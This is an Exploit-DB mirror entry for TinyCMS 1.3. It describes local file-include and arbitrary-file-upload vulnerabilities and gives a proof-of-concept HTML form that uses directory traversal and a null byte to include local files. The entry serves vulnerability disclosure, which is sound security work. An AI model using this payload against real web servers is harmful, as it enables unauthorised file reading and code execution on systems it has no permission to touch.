exploit-db-mirror/platforms/php/webapps/37341.txt
Offensive Security 15dae7c288 DB: 2015-06-24
12 new exploits
2015-06-24 05:02:37 +00:00

12 lines
No EOL
584 B
Text
Executable file

source: http://www.securityfocus.com/bid/53761/info
TinyCMS is prone to multiple local file-include vulnerabilities and an arbitrary-file-upload vulnerability.
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
TinyCMS 1.3 is vulnerable; other versions may also be affected.
<form action='http://www.example.com/index.php?page=../../../../../[ LFI ]%00' method='post'>
<input type='submit' value='Get/Include Local File'>
</form>